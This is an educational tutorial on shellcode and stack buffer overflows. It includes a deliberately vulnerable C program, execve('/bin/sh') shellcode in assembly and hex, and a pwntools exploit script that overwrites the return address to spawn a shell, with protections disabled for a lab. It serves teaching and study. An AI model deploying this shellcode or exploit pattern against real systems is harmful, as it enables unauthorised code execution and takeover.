Shellcode is a small piece of code used as the payload in the exploitation of a software vulnerability. It is typically written in machine code and is designed to be injected into a running program to alter its execution flow. The term “shellcode” originates from its initial purpose, which was to spawn a command shell (like /bin/sh on Unix systems) when executed.
Shellcode was popularized in the context of buffer overflow attacks, where an attacker would exploit a vulnerability to overwrite a program’s memory and insert their own code. When the program executed this code, it would give the attacker control over the system, often by providing a shell. It applied not only to spawning shells but also to performing various malicious actions, such as downloading and executing files, escalating privileges, or creating backdoors. Intel 32-bit architecture (x86) was the most common target for shellcode due to its widespread use in personal computers and servers. However, 64-bit systems and ARM architectures (commonly used in mobile devices) have also become significant targets.
Shellcode is typically written in assembly language, which is then assembled into machine code. The code must be compact and efficient, as it often needs to fit within tight constraints imposed by the vulnerability being exploited. Additionally, shellcode must avoid certain characters (like null bytes) that could terminate strings or cause other issues when injected into a program.
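Which bytes are forbidden depends on the function that copies the input, so it is worth checking a shellcode before using it. The sketch below is a minimal checker; the helper name is hypothetical, and the two byte sequences are the x86_64 encodings of a 64-bit immediate load of the string /bin/sh and of xor rax, rax.

```python
def find_bad_bytes(shellcode: bytes, bad: bytes = b"\x00\n") -> list:
    """Return (index, byte) pairs for every forbidden byte in the shellcode."""
    return [(i, b) for i, b in enumerate(shellcode) if b in bad]

# Encoding of `mov rbx, 0x68732f6e69622f`: the 8-byte immediate holds "/bin/sh"
# plus one zero byte of padding.
mov_rbx = bytes.fromhex("48bb") + b"/bin/sh\x00"
# Encoding of `xor rax, rax`, a common NUL-free way to zero a register.
xor_rax = bytes.fromhex("4831c0")

print(find_bad_bytes(mov_rbx))
print(find_bad_bytes(xor_rax))
```

A NUL byte stops string functions such as strcpy, while a function like fgets keeps reading past NUL bytes and stops at a newline instead, so the bad argument should be adapted to the vulnerable call being targeted.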
Current systems implement several security mechanisms to prevent the execution of shellcode, such as Data Execution Prevention (DEP), which marks data regions such as the stack as non-executable, and Address Space Layout Randomization (ASLR), which randomizes the addresses an attacker would need to know. These mechanisms make it more challenging for attackers to successfully execute shellcode, but they have not eliminated the threat entirely. The example in this section is compiled with some of these protections disabled and is intended for educational purposes only. Even so, understanding shellcode is crucial for cybersecurity professionals, and it remains relevant in specific contexts such as IoT devices and embedded systems, OT environments, and legacy systems.
Consider the following vulnerable program (shellcode_exec.c), which has a buffer overflow vulnerability. The program reads up to 255 bytes of input into a 64-byte buffer, because the size passed to fgets is larger than the buffer. This allows an attacker to overwrite the return address and execute arbitrary code.
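On Linux, the system-wide ASLR setting can be read from /proc/sys/kernel/randomize_va_space. The sketch below is an illustration only: the function name describe_aslr and the wording of the descriptions are assumptions, and the file is simply reported as missing on systems that do not expose it.

```python
# Sketch: report the system-wide ASLR mode on Linux.
# describe_aslr and the description strings are illustrative assumptions.
from pathlib import Path

ASLR_MODES = {
    0: "disabled",
    1: "partial (stack, mmap regions, shared libraries)",
    2: "full (also randomizes the heap)",
}


def describe_aslr(raw):
    """Translate the content of randomize_va_space into a description."""
    value = int(raw.strip())
    return ASLR_MODES.get(value, f"unknown value {value}")


if __name__ == "__main__":
    setting = Path("/proc/sys/kernel/randomize_va_space")
    if setting.exists():
        print("ASLR:", describe_aslr(setting.read_text()))
    else:
        print("ASLR setting not exposed on this system")
```

A hard-coded stack address in an exploit is only stable when this value is 0 or when the process is started with randomization disabled, as gdb does by default for the programs it launches.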
#include <stdio.h>
#include <string.h>
void vulnerable_function() {
    char buffer[64];
    printf("Enter some data: ");
    fgets(buffer, 256, stdin); // Vulnerable: size argument (256) exceeds the buffer (64)
    printf("You entered: %s\n", buffer);
}
int main() {
    vulnerable_function();
    return 0;
}
A shellcode can be injected into the buffer to exploit the vulnerability. A large repository of shellcodes is available at https://shell-storm.org/shellcode/. Take into consideration the architecture and operating system of the target system when choosing one. For this exercise the program must be compiled with the flags -no-pie -fno-stack-protector -z execstack: -z execstack makes the stack executable, -fno-stack-protector disables stack canaries, and -no-pie produces a non-position-independent executable.
Below is an example of a simple shellcode that spawns a shell (/bin/sh) on an x86_64 Linux system:
section .text
global _start
_start:
    ; execve("/bin/sh", NULL, NULL)
    xor rax, rax              ; Clear rax
    mov rbx, 0x68732f6e69622f ; Load "/bin/sh\0" (little-endian) into rbx
    push rbx                  ; Push the string onto the stack
    mov rdi, rsp              ; rdi = pointer to "/bin/sh"
    xor rsi, rsi              ; argv = NULL
    xor rdx, rdx              ; envp = NULL
    mov al, 59                ; Syscall number for execve
    syscall                   ; Invoke the kernel
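The constant loaded into rbx is the string "/bin/sh" packed into a 64-bit little-endian integer, with the unused top byte acting as the terminating null. A short sketch using only the standard library makes the encoding visible. The names IMMEDIATE and immediate_to_bytes are introduced here for illustration.

```python
# Sketch: show how the 64-bit immediate in the listing encodes "/bin/sh".
# IMMEDIATE and immediate_to_bytes are illustrative names.
import struct

IMMEDIATE = 0x68732F6E69622F  # value moved into rbx by the shellcode


def immediate_to_bytes(value):
    """Pack a 64-bit value the way x86_64 stores it in memory (little-endian)."""
    return struct.pack("<Q", value)


if __name__ == "__main__":
    print(immediate_to_bytes(IMMEDIATE))  # b'/bin/sh\x00'
```

Because the string is only seven characters long, the eighth byte of the register is zero, which is why pushing rbx leaves a properly terminated string on the stack.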
To assemble and link the shellcode, and then disassemble the result, use the following commands:
nasm -f elf64 -o shellcode.o shellcode.asm
ld -o shellcode shellcode.o
objdump -d shellcode
Extract the machine code bytes (the hexadecimal column) from the disassembly output. The output will look something like this (addresses may vary):
0000000000401000 <_start>:
  401000:  48 31 c0                 xor    %rax,%rax
  401003:  48 bb 2f 62 69 6e 2f     movabs $0x68732f6e69622f,%rbx
  40100a:  73 68 00
  40100d:  53                       push   %rbx
  40100e:  48 89 e7                 mov    %rsp,%rdi
  401011:  48 31 f6                 xor    %rsi,%rsi
  401014:  48 31 d2                 xor    %rdx,%rdx
  401017:  b0 3b                    mov    $0x3b,%al
  401019:  0f 05                    syscall
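Is this code familiar? It is the same shellcode presented in previous examples, but now we are injecting it directly into the vulnerable program, instead of using ret2syscall. Note that the movabs immediate contains a null byte (00). This is harmless here because fgets stores null bytes and stops only at a newline, but the same payload would be truncated if it were copied with strcpy.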
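Copying the bytes by hand is error-prone, so the extraction step can be scripted. The sketch below assumes the usual objdump -d layout, in which the address, the hex bytes, and the mnemonic are separated by tab characters. The function name bytes_from_objdump and the embedded LISTING are illustrative, not part of the original material.

```python
# Sketch: collect the machine code bytes from "objdump -d" output.
# Assumes tab-separated columns: address, hex bytes, mnemonic.

def bytes_from_objdump(listing):
    """Concatenate the hex-byte column of every instruction line."""
    code = bytearray()
    for line in listing.splitlines():
        fields = line.split("\t")
        # Instruction lines start with "<address>:" followed by a tab.
        if len(fields) < 2 or not fields[0].strip().endswith(":"):
            continue
        code += bytes.fromhex(fields[1])
    return bytes(code)


LISTING = (
    "0000000000401000 <_start>:\n"
    "  401000:\t48 31 c0             \txor    %rax,%rax\n"
    "  401003:\t48 bb 2f 62 69 6e 2f \tmovabs $0x68732f6e69622f,%rbx\n"
    "  40100a:\t73 68 00 \n"
    "  40100d:\t53                   \tpush   %rbx\n"
    "  40100e:\t48 89 e7             \tmov    %rsp,%rdi\n"
    "  401011:\t48 31 f6             \txor    %rsi,%rsi\n"
    "  401014:\t48 31 d2             \txor    %rdx,%rdx\n"
    "  401017:\tb0 3b                \tmov    $0x3b,%al\n"
    "  401019:\t0f 05                \tsyscall\n"
)

if __name__ == "__main__":
    code = bytes_from_objdump(LISTING)
    # Print the bytes in the escaped form used inside Python byte strings.
    print("".join(f"\\x{value:02x}" for value in code))
```

In practice the listing would come from running objdump on the linked shellcode binary. The continuation line of the movabs instruction has no mnemonic column, which is why the parser only requires the first two fields.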
To exploit the vulnerable program using the shellcode, you can create a Python script that constructs the payload and sends it to the program. Below is an example script that does this:
from pwn import *

context.binary = binary = ELF('./shellcode_exec')

def create_payload():
    # execve("/bin/sh", NULL, NULL) for x86_64 Linux
    shellcode = (
        b"\x48\x31\xc0\x48\xbb\x2f\x62\x69\x6e"
        b"\x2f\x73\x68\x00\x53\x48\x89\xe7"
        b"\x48\x31\xf6\x48\x31\xd2\xb0\x3b"
        b"\x0f\x05"
    )
    # The 64-byte buffer and the 8-byte saved rbp precede the return address
    padding_size = 64 - len(shellcode) + 8  # Adjust based on buffer size
    print(f"Padding size: {padding_size}")
    padding = b"A" * padding_size
    # Only stable while ASLR is disabled (gdb disables it by default)
    ret_address = p64(0x7fffffffded0)  # Adjust to the address of the buffer
    payload = shellcode + padding + ret_address
    # Save a copy of the payload so it can be replayed, e.g., inside gdb
    with open("shellcode.bin", "wb") as f:
        f.write(payload)
    return payload

if __name__ == "__main__":
    payload = create_payload()
    p = process('./shellcode_exec')
    p.sendline(payload)
    p.interactive()
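The layout arithmetic used by the script can be verified without pwntools. The following sketch assumes the compiler places buffer directly below the saved rbp, so that the return address sits 72 bytes after the start of the buffer. This should be confirmed in gdb, since compilers may insert extra padding. The names build_payload, BUFFER_SIZE, and SAVED_RBP_SIZE are introduced here for illustration.

```python
# Sketch: build the payload with the standard library and check its layout.
# Assumed stack layout: [buffer: 64 bytes][saved rbp: 8 bytes][return address].
import struct

BUFFER_SIZE = 64     # char buffer[64] in vulnerable_function
SAVED_RBP_SIZE = 8   # saved frame pointer (assumed to follow the buffer directly)

SHELLCODE = bytes.fromhex("4831c048bb2f62696e2f736800534889e74831f64831d2b03b0f05")


def build_payload(shellcode, buffer_address):
    """Return shellcode + padding + little-endian return address."""
    offset = BUFFER_SIZE + SAVED_RBP_SIZE
    if len(shellcode) > offset:
        raise ValueError("shellcode does not fit before the return address")
    payload = shellcode.ljust(offset, b"A") + struct.pack("<Q", buffer_address)
    if b"\n" in payload:
        raise ValueError("payload contains a newline; fgets would stop reading there")
    return payload


if __name__ == "__main__":
    payload = build_payload(SHELLCODE, 0x7FFFFFFFDED0)
    print(len(payload))          # 80
    print(payload[72:].hex())    # d0deffffff7f0000
```

Here struct.pack("<Q", ...) plays the role of p64 from pwntools, and the newline check reflects the fact that fgets stops reading at the first newline byte.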
Tasks:
- Compile the vulnerable program with gcc -o shellcode_exec shellcode_exec.c -no-pie -fno-stack-protector -z execstack -g
- Adjust the ret_address in the script according to your system. You can use gdb to find the correct address where the shellcode will be located in memory.
- Run the script to exploit the vulnerable program and spawn a shell.
- Use gdb to analyze the execution and verify that the shellcode is executed correctly. You can set a breakpoint at the start of the vulnerable_function and step through the execution to see the shellcode in action.
Further Reading
- Smashing The Stack For Fun And Profit
- The Shellcoder’s Handbook: Discovering and Exploiting Security Holes
- Hacking: The Art of Exploitation
- Practical Binary Analysis
- The Art of Software Security Assessment
- Buffer Overflow Attacks: Detect, Exploit, Prevent
- Libc Database
- Shell-Storm Shellcode Repository
- Pwntools Documentation
- GDB Documentation
- ROP Emporium
- CTF Field Guide